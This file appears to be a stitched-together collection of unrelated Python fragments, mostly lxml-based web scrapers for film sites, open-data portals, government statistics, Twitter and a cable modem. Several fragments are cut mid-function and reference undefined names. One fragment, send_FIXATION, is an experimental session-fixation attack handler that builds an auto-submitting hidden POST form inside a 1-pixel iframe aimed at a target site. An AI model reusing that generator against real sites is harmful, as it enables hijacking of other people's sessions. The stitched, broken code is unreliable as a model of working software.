ele.tag: ele.drop_tag() if len(body.cssselect('h1')) > 0: for ele in body.cssselect('h1'): body = ele.getparent() break elif len(body.cssselect('h2')) > 0: for ele in body.cssselect('h2'): body = ele.getparent() break elif len(body.cssselect('h3')) > 0: for ele in body.cssselect('h3'): body = ele.getparent() break elif len(body.cssselect('h4')) > 0: for ele in body.cssselect('h4'): body = ele.getparent() break elif len(body.cssselect('h5')) > 0: for ele in body.cssselect('h5'): body = ele.getparent() break elif len(body.cssselect('h6')) > 0: for ele in body.cssselect('h6'): body = ele.getparent() break fo = open("what.txt", "w+") fo.write(lhtml.tostring(body)) return body
def run(self, content, no_lectures=False, no_exercises=False, class_code=None): doc = parse(StringIO(content)).getroot() subject = Subject.objects.get(abbr=self.parse_subject(doc)) year, is_winter = self.parse_semester(doc) semester = Semester.objects.get(year=year, winter=is_winter) classes = list( map(str.strip, doc.xpath('//tr[@class="rowClass1"]/th/div/span[1]/text()'))) labels = list(doc.xpath('//tr[@class="rowClass1"]/th/div/@title')) default_classes = [] for code in class_code or []: try: default_classes.append( Class.objects.get(semester__year=year, semester__winter=is_winter, code=code, subject__abbr=opts['subject'])) except Class.DoesNotExist: raise ImportException( f"Class with code {code} does not exist.") class_in_db = {} for c, label in zip(classes, labels): if not self.is_allowed(c, no_lectures, no_exercises): continue try: class_in_db[c] = Class.objects.get(code=c, semester=semester, subject=subject) except Class.DoesNotExist: s = label.split(' ') class_in_db[c] = Class() class_in_db[c].code = c class_in_db[c].day = s[6].upper() class_in_db[c].hour = s[7] class_in_db[c].year = datetime.datetime.now().year class_in_db[c].winter = datetime.datetime.now().month >= 9 class_in_db[c].time = s[7] class_in_db[c].subject = subject class_in_db[c].semester = semester first_name, last_name = label.replace(',', '').replace( 'Ph.D.', '').replace('Bc', '').replace('DiS', '').strip().split(' ')[-2:] if first_name and last_name: teacher = User.objects.filter(first_name=first_name, last_name=last_name) if not teacher: raise ImportException( f"Teacher '{first_name}' '{last_name}' not found") class_in_db[c].teacher = teacher[0] class_in_db[c].save() for row in doc.xpath('//table[@class="dataTable"]//tr')[1:]: def clean_name(s): for remove in [ 'Ing', 'Bc', 'BA', 'MBA', 'Mgr', 'MgrA', '.', ',' ]: s = s.replace(remove, '') return ' '.join(s.split()).strip() login = row.xpath('./td[2]/a/text()')[0].strip() email = row.xpath('./td[2]/a/@href')[0].replace('mailto:', '').strip() name = clean_name(row.xpath('./td[3]/a/text()')[0]) lastname, firstname = name.strip().split(' ', 1) member_of = [] created = False user = None try: user = User.objects.get(username=login) except User.DoesNotExist: user = User.objects.create_user(login.upper(), email) user.first_name = firstname user.last_name = lastname user.save() created = True for i, el in enumerate(row.xpath('.//input')): clazz = classes[i] if "checked" in el.attrib: if not self.is_allowed(clazz, no_lectures, no_exercises): continue if user not in class_in_db[clazz].students.all(): member_of.append(clazz) class_in_db[clazz].students.add(user) elif clazz in class_in_db: class_in_db[clazz].students.remove(user) for clazz in default_classes: if user not in clazz.students.all(): member_of.append(clazz.code) clazz.students.add(user) classess = [] for c in Class.objects.filter(students__username=login, semester__year=year, semester__winter=is_winter, subject_id=subject.id): classess.append(f"{c.timeslot} {c.teacher.username}") yield { 'login': login, 'firstname': firstname, 'lastname': lastname, 'created': created, 'classes': classess, }
def test_torrent_rows(self):
    request = urlopen(str(self.torrents.url))
    document = html.parse(request)
    rows = self.torrents._get_torrent_rows(document.getroot())
    self.assertEqual(len(rows), 30)
text = element.text_content().strip() if (element.tag == 'br') and skip_state == 1: if element.tail is not None: text = element.tail.strip() if text != '': full_text.append(text) return { 'title': '%s_%s_%s' % (category, collect, title), 'text': full_text } url = 'http://www.zwbk.org/MyLemmaShow.aspx?lid=76385' connect = urlopen(url) content = connect.read() page = html.parse(StringIO(content.decode('utf-8'))) table = page.xpath('//table/tr/td[2]/div/div[7]') collect_list = [] for links in table[0].find_class('classic'): title = links.text_content().split(u'·') if len(title) > 3: page_url = links.attrib.get('href') collect_list.append({ 'category': title[1], 'collect': title[2], 'title': title[3], 'page_url': page_url }) result = map(lambda x: get_fulltext(**x), collect_list)
fpi = "https://www.fpi.nsdl.co.in/web/Reports/Latest.aspx" header = { 'Accept': '*/*', 'Accept-Language': 'en-US,en;q=0.5', 'Host': 'nseindia.com', 'Referer': 'https://nseindia.com/live_market/dynaContent/live_watch/live_index_watch.htm', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1;WOW64;rv:28.0) Gecko Firefox/45', 'X-Requested-With': 'XMLHttpRequest' } req = urllib2.Request(fpi, headers=header) page = urllib2.urlopen(req) parsed = parse(page) soup = BeautifulSoup(page) page.status_code == 200 doc = parsed.getroot() tables = doc.findall('.//table') table = parse_options_data(tables[0]) xfc = requests.get(fpi, headers=header) xfc.status_code == 200 xpage = urllib2.urlopen(xfc.content) xparse = parse(xfc.content) xtsf = soup(xfc.content) tsd = table_to_2d(xtsf) xtsf.find_all("row")
# -*- coding: UTF-8 -*- import lxml.html as html from lxml.etree import Element, SubElement, ElementTree from lxml import etree tag=[] url_list=[] an_news_list=[] newsTags_list = [] news_title_list = [] for i in range(1,10): root = html.parse('http://www.kinopoisk.ru/news/perpage/200/page/{0}/'.format(i)).getroot() tag.extend(root.find_class('item')) for i in tag: for j in i.iterlinks(): if j[2] == '/name/7418/' or 'id_actor=7418' in j[2]: for y in i.find_class('title').pop().iterlinks(): if 'news' in y[2]: url_list.append('http://www.kinopoisk.ru'+y[2]) an_news_list.append(i.find_class('descr').pop().text_content()) for ind, url in enumerate(url_list): page1 = html.parse(url) root1 = page1.getroot() tag1 = root1.find_class('newsHeaderTitle').pop() news_title = tag1.text_content().strip() news_title_list.append(news_title) tag2 = root1.find_class('newsTags').pop() newsTags = tag2.text_content().split() for i in range(len(newsTags)-1): if u'премьер' in newsTags[i]: newsTags[i] = newsTags[i] + " " + newsTags.pop(i+1)
# -*- coding: utf-8 -*-
import lxml.html as html

tag = []
url_list = []
title_list = []

for i in range(1, 493):
    root = html.parse('http://kinogo.co/page/{0}/'.format(i)).getroot()
    tag.extend(root.find_class('shortstory'))

for i in tag:
    for j in i.iterlinks():
        if 'indijskie_filmy' in j[2]:
            for y in i.find_class('zagolovki').pop().iterlinks():
                if '2010' in y[2]:
                    url_list.append(y[2])
                    title_list.append(i.find_class('zagolovki').pop().text_content())

for i in range(len(url_list)):
    print url_list[i]
    print title_list[i]
csvr = csv.reader(f) csvw = csv.writer(fo) url_tpl = 'http://www.expansion.com/mercados/bolsa/dividendos/{suffix}' p = re.compile('(\d*\.?\d+,\d+)') got_to_sps = False for r in csvr: if r[0] == 'SPS': got_to_sps = True if not got_to_sps: continue url = url_tpl.format(suffix=r[1]) print('processing %s' % url) try: page = urlopen(url) except HTTPError: continue root = html.parse(page) ttrr = root.findall('.//div[@id="dividendos_doble_izquierda"]//tr') if ttrr and len(ttrr) > 1: for tr in ttrr[1:]: ttdd = tr.findall('.//td') d = ttdd[0].text.replace('.', '-') net = p.match(ttdd[2].text).group(0).replace('.', '').replace(',', '.') try: gross = p.match(ttdd[1].text).group(0).replace('.', '').replace(',', '.') except AttributeError: # shit happens gross = float(net) * 1.3333 csvw.writerow([r[0], d, gross, net, ttdd[3].text, ttdd[4].text]) f.close() fo.close()
def get_categorie_content(category_link): # Get the page allrecords = [] parser = etree.HTMLParser(encoding='utf-8') data = etree.parse(rooturl + category_link, parser) # Get the category category = data.xpath('/html/body/div/div[5]/div/div[1]//h1/text()')[0].strip() # category = urllib.unquote(category).decode('utf8') if (verbose): print 'Category: ' + ascii_only(category) datasets = get_datasets(data) numdatasets = len(datasets) if (verbose): print 'There are ' + str(numdatasets) + ' datasets' # Now get the html for each one. This is painful. # The bit of html concerning the datasets: corehtml = data.xpath('//div[@id=\'ContentBlock\']')[0] # First try to split by the horizontal rules. This usually works, but not always datasetparts = etree.tostring(corehtml).split('<hr id="hr') if (verbose): print 'Found ' + str(len(datasetparts)) + ' datasets by splitting by hr elements with ids' if len(datasetparts) != numdatasets: if (verbose): print 'This doesn\'t match. Trying with links to TOC' # If there is TOC, this works. There isn\'t always one. datasetparts = etree.tostring(corehtml).split('nach oben') del datasetparts[len(datasetparts) - 1] for index in range(0, len(datasetparts)): datasetparts[index] = datasetparts[index] + '</a>' if (verbose): print 'Found ' + str(len(datasetparts)) + ' datasets by splitting by links to TOC' if len(datasetparts) != numdatasets: if (verbose): print 'Well, that didn\'t work either. Giving up' print 'Exciting because of a serious error - turn on verbose in the code to find out what dataset is causing the problem' exit() else: if numdatasets > 1: for index in range(1, len(datasetparts)): # That split makes for bad HTML. Make it better. datasetparts[index] = '<hr id="hr' + datasetparts[index] count = 1 for datasetpart in datasetparts: data = etree.HTML(datasetpart) record = {} record['city'] = 'bochum' record['categories'] = [] record['categories'].append(category) datasets = get_datasets(data) record['title'] = datasets[0] if (verbose): print 'Parsing dataset ' + ascii_only(record['title']) if 'noch im Aufbau' in record['title']: # Nothing to see here if (verbose): print 'Empty category' continue record['url'] = rooturl + category_link + '#par' + str(count) count += 1 datatables, filetables = findfilesanddata(data) if len(datatables) == 0: if (verbose): print 'This record contains no data... checking for link to another page...' 
checkforsubpage = data.xpath('//span//a') for link in checkforsubpage: if (verbose): print etree.tostring(link) if len(link.xpath('text()')) > 0 and u'zu den Daten' in link.xpath('text()')[0]: testurl = link.xpath('@href')[0] if (verbose): print 'Following/updating URL: ' + rooturl + testurl record['url'] = rooturl + testurl datatables, filetables = findfilesanddata(html.parse(rooturl + testurl)) # get the data on the files, and get each link in it record['filelist'] = [] for table in filetables: record['filelist'].extend([(rooturl + x) for x in etree.HTML(table).xpath('//a/@href')]) record['formats'] = set() record['spatial'] = False for file in record['filelist']: formatarray = file.split('/')[-1].split('.') format = 'Unknown' if len(formatarray)>1: format = formatarray[1].upper().split('?')[0] elif 'WMS' in formatarray[0]: format = 'WMS' elif 'WFS' in formatarray[0]: format = 'WFS' record['formats'].add(format) if (format.upper() in metautils.geoformats): record['spatial'] = True record['formats'] = list(record['formats']) if len(datatables) > 1: if (verbose): print 'ERROR: More than one data table' print 'Exciting because of a serious error - turn on verbose in the code to find out what dataset is causing the problem' exit() elif len(datatables) == 0: if (verbose): print 'ERROR: No data table' print 'Exciting because of a serious error - turn on verbose in the code to find out what dataset is causing the problem' exit() # parse the data table by row if (verbose): print 'Reading datatable...' rowelements = etree.HTML(datatables[0]).xpath('//tr') for row in rowelements: if len(row.xpath('td[1]/text()')) == 0: continue key = row.xpath('td[1]/text()')[0] if (verbose): print ascii_only(key) if len(row.xpath('td[2]/text()')) != 0: val = row.xpath('td[2]/text()')[0] elif len(row.xpath('td[2]//a')) != 0: val = row.xpath('td[2]//a/text()')[0] else: if (verbose): print 'ERROR: Missing value' print 'Exciting because of a serious error - turn on verbose in the code to find out what dataset is causing the problem' exit() if (verbose): print ascii_only('Parsing key ' + key.replace(':', '') + ' with value ' + val) if u'veröffentlicht' in key: record['publisher'] = val elif u'geändert' in key: record['temporalextent'] = val.split(' ')[2] elif u'Lizenz' in key: record['licenseshort'] = metautils.long_license_to_short(val) record['open'] = metautils.isopen(record['licenseshort']) elif u'Webseite' in key: record['website'] = row.xpath('td[2]//a/@href')[0] # keep, as 'original' metadata if 'http://' not in record['website']: record['website'] = rooturl + record['website'] elif u'Kontakt' in key: record['contact'] = rooturl + row.xpath('td[2]//a/@href')[0] allrecords.append(record) return allrecords
search_tags = [tag.strip() for tag in search_tags.split(",")] search_tags = [tag for tag in search_tags if not (tag == "" or "*" in tag)] info = { "item_id": item_id, "title": title, "subtitle": subtitle, "description_parts": description_parts, "item_pools": item_pools, "item_types": item_types, "search_tags": search_tags } return info platinumgod_content = html.parse('http://platinumgod.co.uk') print("Extracting image information") item_containers = platinumgod_content.xpath( '//div[contains(@class, "items-container")]') item_infos = {} for item_container in item_containers: items = item_container.xpath('.//li[contains(@class, "textbox")]') bar = progressbar.ProgressBar() for item in bar(items): item_info = extract_item_info(item) item_infos[item_info["item_id"]] = item_info print("Extracting trinket information") trinket_containers = platinumgod_content.xpath( '//div[contains(@class, "trinkets-container")]')
if len(sys.argv) < 2:
    print "Usage"
    sys.exit(1)

genre = sys.argv[1]
datadir = 'mc-data/' + genre
csvfile = open(os.path.join(datadir, genre + '.csv'), 'w')
writer = csv.writer(csvfile)
writer.writerow(['Artist', 'Album', 'Score'])

for page in sorted(os.listdir(datadir)):
    if page.endswith('html'):
        print 'parsing page ' + page
        page_file = open(os.path.join(datadir, page), 'r')
        doc = html.parse(page_file).getroot()
        try:
            for li in doc.cssselect('li.release_product'):
                album = li.cssselect('div.product_title')[0].text_content().strip()
                score = li.cssselect('span.metascore')[0].text_content().strip()
                artist = li.cssselect('li.product_artist')[0].cssselect('span.data')[0].text_content().strip()
                print 'artist: %s, album: %s, score: %s' % (artist, album, score)
                writer.writerow([artist, album, score])
        except Exception as e:
            print e
def parsePages(): # get the pagetitle path = r'/Users/carolm/Desktop/lingrad' for dirpath, subdirs, files in os.walk(path): for x in files: if fnmatch.fnmatch(x, '*.html'): item = os.path.join(dirpath, x) doc = parse(item).getroot() print doc.text_content() cleaner = Cleaner( style=True, links=False, ) cleaned = cleaner.clean_html(doc) titles = cleaned.find_class('Pagetitle') if titles: # snag the page title - method returns list. . there's really only one title = titles[0].text_content() else: try: titlesel = cleaned.xpath('//p[@class="Subhead"]') title = titlesel[0].text_content() except: pass # get the description descrips = cleaned.find_class('Summarytext') if descrips: descrip = descrips[0].text_content() else: descrip = "no description" #get the body if cleaned.find_class('Summarytext'): bodies = cleaned.xpath( '//p[@class="Summarytext"]/following-sibling::p') elif cleaned.find_class('Subhead'): bodies = cleaned.xpath( '//p[@class="Subhead"]//following-sibling::p') else: bodies = cleaned.xpath('*//p') html = "".join([ lxml.html.tostring(body, method='xml') for body in bodies ]) html = html.replace('\n', ' ').replace('\r', ' ') html = html.replace(' ', ' ').replace(' ', ' ') html = html.replace('
', ' ').replace('
', ' ') html = html.replace('•', '').replace(' ', '') html = html.replace(' ', '') html = html.replace('class="msoNormal"', '').replace('###', '') html = html.replace('<span> </span>', '') # html = re.sub(r'<p.*?[.*?Body text:.*?].*?</p>', r'', html) html = re.sub(r'<p class="Bullettext">(.*?)</p>', r'<li>\1</li>', html) html = re.sub(r'<p class="Subhead1">(.*?)</p>', r'<h3>\1</h3>', html) newbody = html #Need to have temporary id id = str(random.randint(0, 99999999)) target.invokeFactory("Document", id) obj = target[id] obj.setTitle(title) obj.setDescription(descrip) obj.setText(newbody) # Will finish Archetypes content item creation process, # rename-after-creation and such obj.processForm() transaction.savepoint(optimistic=True) # Need to perform manual normalization for id, # as we don't have title available during the creation time normalizer = getUtility(IIDNormalizer) new_id = normalizer.normalize(obj.Title()) if new_id in target.objectIds(): raise RuntimeError("Item already exists:" + new_id + " in " + target.absolute_url()) obj.aq_parent.manage_renameObject(id, new_id) transaction.commit() obj.reindexObject()
def send_FIXATION(self, tokens, tokenvals, targetval, destination, postvars, postvals, fixvars, fixvals, idsrc): """ EXPERIMENTAL: This is the fixation handler. It needs a lot of work and is very simple at the moment. It's currently Experimental and just used to demonstrate a PoC of this type of attack """ # Yes, I realize a lot of this is duplicated from the previous payload. It's just because I don't know # what the hell is going to happen with it. # Give the value to the meta refresh metadest = "0;" + destination # Make the request for the idsrc request = urllib2.Request(idsrc) opener = urllib2.build_opener() # Add a useragent to the request, Yeah, I know. This should be user definable. Maybe later. request.add_header( 'User-Agent', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11' ) response = opener.open(request).read() root = html.parse(StringIO(response)) ########################### # ToDo: Currently only looks for name = value situations. Needs to # possibly look for others too such as id ########################### # Grab the data values for fixation for index, value in enumerate(fixvars): for node in root.iter(): if node.get('name') == value: fixvals[index] = node.get('value') # Append the fixated values in to the POST variables and values for value in fixvars: postvars.append(value) for value in fixvals: postvals.append(value) header = '<meta http-equiv="refresh" content="%s" />' % metadest page2 = open("page2.html", "wb") innerpage = markup.page() innerpage.init() formsubmit = "javascript:document.myform.submit()" formname = "myform" formaction = "post" inputtype = "hidden" innerpage.body(onload=formsubmit) innerpage.form(name=formname, action=targetval, method=formaction) for index, val in enumerate(postvars): innerpage.input(name=val, type=inputtype, value=postvals[index]) innerpage.form.close() page2.write(str(innerpage)) page2.close() # Create primary page page = markup.page() page.init(header=header) # This is a hack for Markup.py so it will properly close the iframe tag ifrmtext = "this" ifrmsrc = "page2.html" page.iframe(ifrmtext, height="1", width="1", src=ifrmsrc) # page.form(formvals, name=formname, method=attacktype, action=targetval) # print(page) self.wfile.write(page)
import smtplib import main from os.path import basename #from pandas import DataFrame from time import gmtime, strftime addresses, email_list = main.ReadConfig("main.ini", "mosclinic") main_domain_stat = addresses[0].split("/")[2] print main_domain_stat today = strftime("%d.%m.%Y %H:%M", gmtime()) a = [] b = [] table_data = [] for page_link in addresses: page = html.parse(page_link) #for el in page.getroot().find_class('noline'): for el in page.getroot().find_class('margin15 font_arial12 as_a2'): link = el.values()[2] if "medreview" in link: page1 = html.parse('%s' % (link)) content = page1.getroot().find_class( 'margin15 font_arial12')[0].text_content() #imgs = page1.getroot().findall(".//img[@style]") dates = page1.getroot().findall(".//meta[@itemprop]") for date in dates: if date.items()[0][0] == "itemprop" and date.items( )[0][1] == "datePublished": time = date.items()[1][1] content_link = content + "<br>" + link
def on_data(self, data): global f global filecnt global tweetcnt global chkFlag #Checking if the file count has reached 50 (i.e 5GB) if (filecnt >= 50): print "filecnt" chkFlag = False return False #Checks the number of tweets if tweetcnt >= numTweets and numTweets != 0: print "first" chkFlag = False return False #Create a new text file every 100MB if (f.tell() >= 104857600): print "last" f.close() chkFlag = True filecnt += 1 file_output_path = dirName + "/tweets_data{0}.txt".format(filecnt) f = open(file_output_path, 'a') decoded = json.loads(data) #Get Hastags hashTags = decoded['entities']['hashtags'] if (hashTags != "[]"): for htags in hashTags: hashTags = unicode(htags['text']).encode("ascii", "ignore") #Get tweet tweet = unicode(decoded['text']).encode("ascii", "ignore").replace( '\n', ' ').replace('\t', '').replace('\r', '') #Get Co-ordinates coord = unicode(decoded['coordinates']).encode("ascii", "ignore") #Get tweet time tweetTime = unicode(decoded['created_at']) #Get retweet count retweetCount = unicode(decoded['retweet_count']).encode( "ascii", "ignore") #Get reply count replyCount = unicode(decoded['reply_count']).encode("ascii", "ignore") #Get favorite count favoriteCount = unicode(decoded['favorite_count']).encode( "ascii", "ignore") #Get URLs urls = unicode(decoded['entities']['urls']).encode("ascii", "ignore") #Get title pageTitle = None expanded_url = None if urls != "[]": expanded_url = unicode( decoded['entities']['urls'][0]['expanded_url']).encode( "ascii", "ignore") try: page = urllib2.urlopen(expanded_url) p = parse(page) pageT = p.find(".//title") if (pageT != None): pageTitle = unicode(p.find(".//title").text).encode( "ascii", "ignore") except urllib2.HTTPError, err: if err.code == 404: print "Page not found!" elif err.code == 403: print "Access denied!" else: print "Error:", err.code except urllib2.URLError, err: print "URL error:", err.reason
def convert(self, fn=None, dirn=None): global sample_name, lab, fl def extract_file_data(lns, dlm): chapters = re.split(dlm + "{3,}", lns) for chapter in chapters: chapter = chapter.strip() div = etree.SubElement(doc, 'block') paragraphs = re.split(delim + "{1,2}", chapter) for i in range(len(paragraphs)): pgph = etree.SubElement(div, 'block') pgph.text = paragraphs[i] if fn is None: print('Type in filename') fn = input() fl = fn sample_name = '' lab = 'lab1' else: fl = Path(dirn) / fn sample_name = ''.join( filter(bool, re.split(r'/|\w(?!\w*/$)', dirn))) + '/' lab = re.match(r'\w+(?=/)', dirn).group(0) route = re.split(r'/', fn) xml_fn = '.xml'.join(re.split(r'\.\w+$', route[len(route) - 1])) doc = etree.Element('doc') doc.attrib['name'] = xml_fn if re.search(r'\.txt$', fn): f = open(fl, encoding='utf8') lines = ''.join(f.readlines()) delim = r'\n' extract_file_data(lines, delim) elif re.search(r'\.html$', fn): file = codecs.open(fl, 'r') file_content = file.read() parser = html.HTMLParser() html_tree = html.parse(io.StringIO(file_content), parser) for b in html_tree.xpath('//div[p]'): block = etree.SubElement(doc, 'block') for idx, p in enumerate(html_tree.xpath('//div/p')): paragraph = etree.SubElement(block, 'block') p_child_text = '' for el in html_tree.xpath('//div/p[' + str(idx + 1) + ']/*'): p_inner = etree.SubElement(paragraph, 'block') p_inner.text = escape(el.text_content()) p_child_text = ''.join(p_child_text.split(el.text_content())) \ if p_child_text \ else ''.join(p.text_content().split(el.text_content())) paragraph.text = escape(''.join( re.split(r'\n{2,}| +\n', p_child_text))) elif re.search(r'\.docx$', fn): file = docx.Document(fl) lines = [] for p in file.paragraphs: lines.append(p.text) lines = '\n'.join(lines) delim = r'\n' extract_file_data(lines, delim) elif re.search(r'\.pdf$', fn): rsc_mngr = PDFResourceManager() fh = io.StringIO() converter = TextConverter(rsc_mngr, fh) pg_interp = PDFPageInterpreter(rsc_mngr, converter) fp = open(fl, 'rb') for pg in PDFPage.get_pages(fp, caching=True, check_extractable=True): pg_interp.process_page(pg) lines = ''.join(re.split(r'\n{2,}|\x0c', fh.getvalue())) converter.close() fh.close() delim = ' ' extract_file_data(lines, delim) else: print('Incorrect filename extension!') tree = etree.ElementTree(doc) tree.write("%s/xml_samples/%s%s" % (lab, sample_name, xml_fn), pretty_print=True, xml_declaration=True, encoding='UTF-8') return '%s/xml_samples/%s%s' % (lab, sample_name, xml_fn)
def get_listings(): page = 1 totalPages = 1 shows = [] while page <= totalPages: response = urlopen(DATA_URL % str(page)) data = json.loads(response.read().decode()) totalPages = data["totalPages"] for product in data["data"]: show = {} show["title"] = product["name"] show["image"] = product["imageUrl"] show["type"] = "movie" print(show["title"], product["prodUrl"]) # get price from data url try: doc = lh.parse(urlopen(product["prodUrl"])) prices = doc.xpath(".//span[contains(@class, 'price')]") if len(prices) > 0: price = prices[0].text.strip()[1:] print(price) show["episodes"] = [{ "show": product["name"], "uri": product["prodUrl"], "s": 0, "e": 0, "price": price }] shows.append(show) except: pass page = page + 1 page = 1 totalPages = 1 while page <= totalPages: response = urlopen(DATA_URL_TV % str(page)) data = json.loads(response.read().decode()) totalPages = data["totalPages"] for product in data["data"]: show = {} id = product["id"] series = 0 title = re.sub(r' (Series|Season) \d+[a-zA-Z]?\b', '', product["name"].strip()) matches = re.search(r"\d+[a-zA-Z]?\b", product["name"].strip()) if matches: series = matches.group(0) episodes = get_episodes(id, series, product["prodUrl"]) for x in shows: # merge seasons if x["title"] == title: x["episodes"] = x["episodes"] + episodes break else: # new show show = {} show["title"] = title show["type"] = "tv" show["episodes"] = episodes show["image"] = product["imageUrl"] shows.append(show) page = page + 1 return shows
"""
download DHS Yearbook tables of Immigration Statistics 2015
"""
from lxml import html
from urllib import request
import numpy as np
import pandas as pd

if __name__ == "__main__":
    captions = set()
    writer = pd.ExcelWriter('dhs.xlsx', engine="xlsxwriter")
    for table_num in range(1, 42):
        url = "https://www.dhs.gov/immigration-statistics/"\
              "yearbook/2015/table{0}".format(table_num)
        tree = html.parse(request.urlopen(url))
        _path = '//*[@id="content-area"]/div/div/article/div[1]/div[2]/div/div/table'
        tables = tree.xpath(_path)
        """
        Some tables contain data by continents and by countries.
        The data by countries will override the one for continents
        in the following for loop
        """
        for table in tables:
            data = [row.text_content().strip().split("\n")
                    for row in table.xpath('//tr')]
            cap = table.xpath('//caption')[0].text_content()
            df = pd.DataFrame(data=data[1:])
            if df.shape[1] == len(data[0]):
                df.columns = data[0]
            df.replace('-', np.nan, inplace=True)
            df.to_excel(writer, sheet_name="Table{}".format(table_num), index=False)
# movie_xpath, the name/info xpath templates, next_pages and the helpers
# regular_expression / list_append are defined earlier in the original script.
movie_comment_xpath = "//ol/li[{}]/div/div/div/p/span/text()"
movie_ratting_xpath = "//ol/li[{}]/div/div/div/div/span[@class='rating_num']/text()"

movie_name_Chineses = []
movie_name_Englishs = []
movie_comments = []
movie_rattings = []
movie_directors = []
movie_actors = []
movie_ages = []
movie_countrys = []
movie_categorys = []

# 2. Start crawling the page content.
while next_pages:
    dom = html.parse(urlopen(next_pages))
    movies = dom.xpath(movie_xpath)
    for i in range(len(movies)):
        movie_name_Chinese = dom.xpath(movie_name_Chinese_xpath.format(i + 1))
        # Strip the slash and surrounding whitespace from the English title.
        movie_name_English = dom.xpath(movie_name_English_xpath.format(i + 1))
        movie_info = dom.xpath(movie_info_xpath.format(i + 1))
        movie_comment = dom.xpath(movie_comment_xpath.format(i + 1))
        movie_ratting = dom.xpath(movie_ratting_xpath.format(i + 1))

        movie_info_detail = regular_expression(movie_info)
        director = movie_info_detail[0]
        list_append(director, movie_directors)
        actor = movie_info_detail[1]
        list_append(actor, movie_actors)
a8 = []
a9 = []
a10 = []
a21 = []
a22 = []
a23 = []
a24 = []
a25 = []
a26 = []
a27 = []
a28 = []

bar = Bar('Processing', max=part)
for i in range(s, s + part):
    br = mec.Browser()
    page = br.open(sitelinks[i])
    tree = html.parse(page)
    # Definition-list fields (dd[1]..dd[10]) on the item page.
    get1 = tree.xpath('/html/body/div[2]/div[3]/div[3]/div[1]/dl/dd[1]/text()')
    get2 = tree.xpath('/html/body/div[2]/div[3]/div[3]/div[1]/dl/dd[2]/text()')
    get3 = tree.xpath('/html/body/div[2]/div[3]/div[3]/div[1]/dl/dd[3]/text()')
    get4 = tree.xpath('/html/body/div[2]/div[3]/div[3]/div[1]/dl/dd[4]/text()')
    get5 = tree.xpath('/html/body/div[2]/div[3]/div[3]/div[1]/dl/dd[5]/text()')
    get6 = tree.xpath('/html/body/div[2]/div[3]/div[3]/div[1]/dl/dd[6]/text()')
    get7 = tree.xpath('/html/body/div[2]/div[3]/div[3]/div[1]/dl/dd[7]/text()')
    get8 = tree.xpath('/html/body/div[2]/div[3]/div[3]/div[1]/dl/dd[8]/text()')
    get9 = tree.xpath('/html/body/div[2]/div[3]/div[3]/div[1]/dl/dd[9]/text()')
    get10 = tree.xpath('/html/body/div[2]/div[3]/div[3]/div[1]/dl/dd[10]/text()')
    try:
        # First column of the spec table on the same page.
        get21 = tree.xpath('/html/body/div[2]/div[3]/div[2]/div[1]//tr/td[1]/text()')[0]
        get22 = tree.xpath('/html/body/div[2]/div[3]/div[2]/div[1]//tr/td[1]/text()')[1]
        get23 = tree.xpath('/html/body/div[2]/div[3]/div[2]/div[1]//tr/td[1]/text()')[2]
        get24 = tree.xpath('/html/body/div[2]/div[3]/div[2]/div[1]//tr/td[1]/text()')[3]
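# Aside (a sketch, not part of the loop above): tree.xpath() already returns every
# matching text node as a list, so the ten dd[N] lookups and the indexed td[1] lookups
# could be collapsed into two calls reusing the same XPaths:
dd_texts = tree.xpath('/html/body/div[2]/div[3]/div[3]/div[1]/dl/dd/text()')      # get1 .. get10
td_texts = tree.xpath('/html/body/div[2]/div[3]/div[2]/div[1]//tr/td[1]/text()')  # get21 .. get28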
import scraperwiki
from itertools import count
from lxml import html

BASE = "http://www.openpr.de/news/%s"

# Resume from the last saved id, or start at 1.
initial = scraperwiki.sqlite.get_var('num', 1)
for i in count(initial):
    url = BASE % i
    try:
        doc = html.parse(url)
        pm = doc.find('//div[@id="pm"]')
        pm_str = html.tostring(pm)
        scraperwiki.sqlite.save(["id"], {'id': i, 'pm': pm_str, 'url': url})
        print "AYE", i
    except Exception:
        print "FAIL", i
    # Remember how far we got so the next run can resume here.
    scraperwiki.sqlite.save_var('num', i)
import scraperwiki
from lxml import html

base_url = "http://fbinter.stadt-berlin.de/rbs/rbs-lookup.jsp"
#streets_url = "http://fbinter.stadt-berlin.de/rbs/rbs-lookup.jsp?beznr=&otnr=%s"
#streets_url = "http://fbinter.stadt-berlin.de/rbs/rbs-slct-str.jsp?beznr=&otnr=%s&strnr=&strname=&hausnr=&go=&mapLabel=&targetUrl="
# data_url, streets_url and houses_url are defined elsewhere in the original scraper.


def get_data(street, house):
    url = data_url % (street, house)
    print url
    doc = html.parse(url)
    data = {'strnr': street, 'hausnr': house}
    for row in doc.findall('//table[@class="hnrresult"]//tr'):
        name, value = row.findall('./td')
        name = str(name.text_content().encode('ascii', 'ignore'))
        name = name.replace(':', '_').replace('.', '-').replace(' ', '_')
        value = value.xpath('string()').strip()
        data[name] = value
    print data
    #scraperwiki.sqlite.save(unique_keys=["strnr", "hausnr"],
    #                        data=data)


# Walk districts -> streets -> house numbers.
doc = html.parse(base_url)
for option in doc.findall('//select[@name="otnr"]/option'):
    sdoc = html.parse(streets_url % option.get('value'))
    for street in sdoc.findall('//input[@name="strnr"]'):
        hdoc = html.parse(houses_url % street.get('value'))
        for house in hdoc.findall('//input[@name="hausnr"]'):
            print house.items()
            print dir(house)
            #get_data(street.get('value'), house.get('value'))
def getsurf():
    if debugParse:
        try:
            tree = html.parse('Status.html')
        except Exception as e:
            eprint(e)
            return os.EX_IOERR
    else:
        # Wait for network to come up from system sleep
        if sleepsec > 0:
            time.sleep(sleepsec)
        # Try to bring up network device with ping.
        if pings > 0:
            try:
                ping = subprocess.run(
                    ["ping", "-o", "-q", "-i", str(pingwait),
                     "-c", str(pings), "-n", ip],
                    stdin=subprocess.DEVNULL,
                    stdout=subprocess.DEVNULL,
                    stderr=subprocess.DEVNULL)
                if ping.returncode != 0:
                    eprint("warning: {} returned {}".format(
                        ' '.join(ping.args), ping.returncode))
            except Exception as e:
                eprint(e)

        # read surfboard admin password from file on working directory
        try:
            with open('surfboard_password.txt', 'r') as pwdfile:
                passwd = pwdfile.readline().strip()
        except Exception as e:
            eprint(e)
            return os.EX_IOERR

        login_url = 'http://' + ip + '/cgi-bin/adv_pwd_cgi'
        status_url = 'http://' + ip + '/cgi-bin/status'
        logout_url = 'http://' + ip + '/cgi-bin/status#'

        ar_nonce = '{:08d}'.format(random.randint(0, 99999999))
        payload = {
            'username': '******',
            'password': passwd,
            'ar_nonce': ar_nonce
        }

        try:
